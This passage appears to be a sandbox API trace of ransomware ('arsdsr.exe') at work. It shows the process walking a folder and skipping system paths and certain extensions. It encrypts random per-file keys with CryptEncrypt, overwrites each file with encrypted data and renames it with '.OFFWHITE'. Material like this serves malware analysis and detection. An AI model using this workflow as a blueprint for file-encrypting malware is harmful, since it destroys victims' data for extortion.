(x86)") returned -1 [0143.755] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.755] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_MTOC_help.H1H" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" [0143.755] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.755] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.755] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".exe") returned 1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".log") returned -1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".cab") returned 1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".cmd") returned 1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".com") returned 1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".cpl") returned 1 [0143.755] lstrcmpiW (lpString1=".H1H", lpString2=".ini") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".dll") returned 1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".url") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".ttf") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".mp3") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".pif") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".mp4") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".OFFWHITE") returned -1 [0143.756] lstrcmpiW (lpString1=".H1H", lpString2=".msi") returned -1 [0143.756] lstrcmpiW (lpString1="Help_MTOC_help.H1H", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.756] GetProcessHeap () returned 0x500000 [0143.756] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522240 [0143.756] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.756] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=499482) returned 1 [0143.757] GetProcessHeap () returned 0x500000 [0143.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.757] GetProcessHeap () returned 0x500000 [0143.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.757] GetProcessHeap () returned 0x500000 [0143.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.757] GetProcessHeap () returned 0x500000 [0143.757] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.757] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.757] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.757] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.757] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.757] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.757] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.758] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x79f1a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.758] SetLastError (dwErrCode=0x0) [0143.758] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.762] GetLastError () returned 0x0 [0143.762] GetLastError () returned 0x0 [0143.762] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x7a01a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.762] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.762] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x7a11a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.762] WriteFile (in: hFile=0x1e4, lpBuffer=0x522240*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522240*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.762] GetProcessHeap () returned 0x500000 [0143.763] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x79f1a) returned 0x2960048 [0143.765] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.765] ReadFile (in: hFile=0x1e4, lpBuffer=0x2960048, nNumberOfBytesToRead=0x79f1a, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesRead=0x295cb40*=0x79f1a, lpOverlapped=0x0) returned 1 [0143.800] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.800] WriteFile (in: hFile=0x1e4, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x79f1a, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295cb4c*=0x79f1a, lpOverlapped=0x0) returned 1 [0143.802] GetProcessHeap () returned 0x500000 [0143.802] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0143.802] CloseHandle (hObject=0x1e4) returned 1 [0143.815] GetProcessHeap () returned 0x500000 [0143.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.815] GetProcessHeap () returned 0x500000 [0143.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.815] GetProcessHeap () returned 0x500000 [0143.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.815] GetProcessHeap () returned 0x500000 [0143.815] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.815] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" [0143.815] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.OFFWHITE" [0143.815] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h.offwhite")) returned 1 [0143.816] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x26353250, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2=".") returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="..") returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="...") returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="windows") returned -1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="$recycle.bin") returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="rsa") returned -1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="ntuser.dat") returned -1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="programdata") returned -1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="appdata") returned 1 [0143.816] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="program files") returned -1 [0143.817] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="program files (x86)") returned -1 [0143.817] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.817] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_MValidator.H1D" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" [0143.817] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.817] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.817] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".exe") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".log") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".cab") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".cmd") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".com") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".cpl") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".ini") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".dll") returned 1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".url") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".ttf") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".mp3") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".pif") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".mp4") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".OFFWHITE") returned -1 [0143.817] lstrcmpiW (lpString1=".H1D", lpString2=".msi") returned -1 [0143.817] lstrcmpiW (lpString1="Help_MValidator.H1D", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.817] GetProcessHeap () returned 0x500000 [0143.817] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522250 [0143.818] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.818] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=14660) returned 1 [0143.818] GetProcessHeap () returned 0x500000 [0143.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.818] GetProcessHeap () returned 0x500000 [0143.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.818] GetProcessHeap () returned 0x500000 [0143.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.818] GetProcessHeap () returned 0x500000 [0143.818] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.818] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.818] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.818] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.818] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.819] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.819] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.819] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.819] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.819] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.819] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3944, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.819] SetLastError (dwErrCode=0x0) [0143.819] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.823] GetLastError () returned 0x0 [0143.823] GetLastError () returned 0x0 [0143.823] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3a44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.823] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.823] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x3b44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.823] WriteFile (in: hFile=0x1e4, lpBuffer=0x522250*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x522250*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0143.824] GetProcessHeap () returned 0x500000 [0143.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3944) returned 0x55d7d0 [0143.824] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.824] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x3944, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x3944, lpOverlapped=0x0) returned 1 [0143.826] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.826] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x3944, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x3944, lpOverlapped=0x0) returned 1 [0143.826] GetProcessHeap () returned 0x500000 [0143.826] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0143.826] CloseHandle (hObject=0x1e4) returned 1 [0143.832] GetProcessHeap () returned 0x500000 [0143.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0143.832] GetProcessHeap () returned 0x500000 [0143.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0143.832] GetProcessHeap () returned 0x500000 [0143.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0143.832] GetProcessHeap () returned 0x500000 [0143.832] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0143.832] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" [0143.833] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.OFFWHITE" [0143.833] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d.offwhite")) returned 1 [0143.833] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x24534c56, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae45604d, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae45604d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x6e006c, dwReserved1=0x295d670, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0143.833] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2=".") returned 1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="..") returned 1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="...") returned 1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="windows") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="$recycle.bin") returned 1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="rsa") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="ntuser.dat") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="programdata") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="appdata") returned 1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="program files") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="program files (x86)") returned -1 [0143.834] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\" [0143.834] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\", lpString2="Help_MValidator.Lck" | out: lpString1="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" [0143.834] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.834] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.834] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".exe") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".log") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".cab") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".cmd") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".com") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".cpl") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".ini") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".dll") returned 1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".url") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".ttf") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".mp3") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".pif") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".mp4") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".OFFWHITE") returned -1 [0143.834] lstrcmpiW (lpString1=".Lck", lpString2=".msi") returned -1 [0143.834] lstrcmpiW (lpString1="Help_MValidator.Lck", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0143.834] GetProcessHeap () returned 0x500000 [0143.834] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522260 [0143.835] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0143.835] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=4) returned 1 [0143.835] GetProcessHeap () returned 0x500000 [0143.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0143.835] GetProcessHeap () returned 0x500000 [0143.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0143.835] GetProcessHeap () returned 0x500000 [0143.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0143.835] GetProcessHeap () returned 0x500000 [0143.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0143.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.835] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0143.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.835] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0143.835] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.835] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.835] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295c910*=0x100) returned 1 [0143.836] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0143.836] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0143.836] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295c90c*=0x100) returned 1 [0143.836] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.836] SetLastError (dwErrCode=0x0) [0143.836] WriteFile (in: hFile=0x1e4, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0143.837] GetLastError () returned 0x0 [0143.837] GetLastError () returned 0x0 [0143.837] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x104, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.837] WriteFile (in: hFile=0x1e4, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 